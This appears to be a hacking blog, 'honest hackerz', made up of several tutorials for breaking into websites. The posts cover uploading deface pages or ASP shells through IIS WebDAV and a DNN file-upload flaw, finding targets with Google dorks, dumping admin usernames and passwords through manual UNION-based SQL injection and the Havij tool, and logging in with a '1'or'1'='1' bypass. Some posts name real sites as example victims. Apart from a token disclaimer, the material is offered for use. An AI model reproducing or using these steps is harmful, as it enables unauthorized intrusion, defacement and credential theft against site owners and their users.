honest hackerz
i am a honest hacker
we are honest hackerz so beware of us......... this is the most important news

xss hacking

Posted by ENJOY NEW TECHNOLOGY

Wednesday, June 29, 2011
Read More

How to Hack Website with IIS Exploit. [Tutorial] (For Window Xp)

Posted by ENJOY NEW TECHNOLOGY





In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.

STEP 1: Click on Start button and open "RUN".

STEP 2: Now Type  this in RUN

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".

STEP 5: Now Click on "Finish"

STEP 6: Now the folder will appear. You can open it and put any deface page or anything.

STEP 7: I put  text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.


.
Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"
In your case it will be " www.[sitename].com/[file name that you uploaded]
"

Read More

DNN method Complete Tutorial How to hack a Web site with Asp shell

Posted by ENJOY NEW TECHNOLOGY

 Download this Shell
Step 1 : 
http://www.google.com

Step 2:Now enter this dork (this is Dork for find DNN Valn sites)

:inurl:/tabid/36/language/en-US/Default.aspx
        or
   inurl:/Fck/fcklinkgallery.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
it will show you many sites, Copy any one of site.

Step 4: 
For example take this site.
Example:


http://www.itservicespro.net
Step 5: Now Paste after the site url
  this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so Site is this : 
http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so it will look like this (screenshot below)
Note:  if it will show you like this (see screenshot below) its mean site could not hack find another site
 

Now Click on File ( A File On Your Site )

Step 8:Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your shell ASp Download it here
After upload 
go for your shell  www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/umer.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on <Dir>...  again and again till you will see admin
 so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\
and upload your deface index page so
this is your result www.site.com/urpagename.html
for example see this http://www.itservicespro.net/umer.html 
a
If  you want to deface main page then click on Admin dir and search for index htm or html and click on Edit and copy your deface page code and replace there...:)
FOR EDUCATIONAL PURPOSE ONL
Y

Read More

How to Hack Web Site Sql Injection manually Full Detailed Tutorial

Posted by ENJOY NEW TECHNOLOGY


SQL Injection: is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)





What will I need to perform an SQL Injectionattack?


[+] exploit scanner/Google
[+] a good list of "google dorks"
[+] admin finder (Use Havij)
[+] half a brain and the will to learn lol Tongue


THE LIST OF GOOGLE DORKS ARE HERE:


Example i take this Dork
Code:
inurl:index.php?id=
paste this dork on google. google will show you much sites copy any one


Code:
sqlivulnerablesite.com/index.php?id=1'



*NOTE* With this exploit scanner it auto-quotes all the urls.


Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1



Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--



Load the page. If the page loads correctly with that code injection in the url then we are on the right track 


Knowing that there is already 1 column in this database we do another code injection. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--



If the page loads correctly again then this attack can still be performed.


Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10. 

*NOTE* If you load the web page on a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--



and you get a result like this.
Code:
Unknown column '10' in 'order clause'



Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--



If your page loads correctly then this means there is 9 columns in the database 


The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--



After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9



When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--



After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--



*NOTE* Here (x) is the ascii value of the table name.


Now we must find the ascii value of the word admins. 


The ascii value of admins is
Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;



Delete all the ";" , "#" , and "&". So it should look like this.
Code:
97,100,109,105,110,115



Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--



When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --



*NOTE* (0x3a) is the ascii value of the column name


When the page loads it should show the data of the username and password for cpanel access.

Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise. 

Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!

Read More

How to Hack Web Site with Havj Complete Detailed Tut

Posted by ENJOY NEW TECHNOLOGY

                                           
1st Of All Download this things you will need that things
SQl Dork List
Havj Pro
So Step 1 Open Dork List and copy any dork and paste it on google.com
Google will show you much sites copy any any one of site

 Step 2: past the url of site which you copied in step 1 and hit Analyze
After a minute it will show you a green line in last box (Target is Valnurable) its mean you can hack this site Easily, (Note if there will type in red line that target is not valn its mean you cant hack that site, find another)
Step 3: Now Click on Tables and hit on (Get DBs) it will show you nothing, then hit on Get Tables it will show you a box (Admin) check it or tick it and click on get Columns
 Step 4: it will show you some boxes other sites will show you much boxes only tick/check that boxes which the name of usernam/password check that, and hit on Get DAta
Now thats it it will show you password and username
now a probleb is that where is admin Login
 Step 5: Click on Find Admin and paste the url of that site and hit on Start after some seconds it will show you admin logins....thats it
Open Admin Login and paste username/passwords and hack it..:P
thats it guyz enjoy if you have problem you can email me or comment here

Read More

How To Hack Site with Simple Sql Injection Detailed Tutorial+Video

Posted by ENJOY NEW TECHNOLOGY





or Learn Tutorial by read Text below
step 1: Step 1 Download this Dork listand open it Copy any one of dork and paste it on Google
Now Google will show you alot of Web sites, check any one,
For Example i have a site, www.abhai.org.in,
Now we have 2 Problems 1 is find admin 2nd is Hack Admin panel
solution of problem no 1 admin find:
step 1: download this tool click here to download
now open Havj and Click on Find Admin
Enter Site url in box and click on Start
it will show you admin login after a minute open url
so we got, www.abhai.org.in/admin
Now download Sql querioes
sql quesries list download by click here
Now go to Admin login
and in username box type "admin" (without "" quotes)
and in password box also type admin and check if login not success then type 1'or'1'='1
so user : admin
passowrd admin
or
password : 1'or'1'='1
or login success



thats it guyzz mostly Sites hacked by this method must check my other Tutorial about sql different metho
d

Read More
honest hackerz

video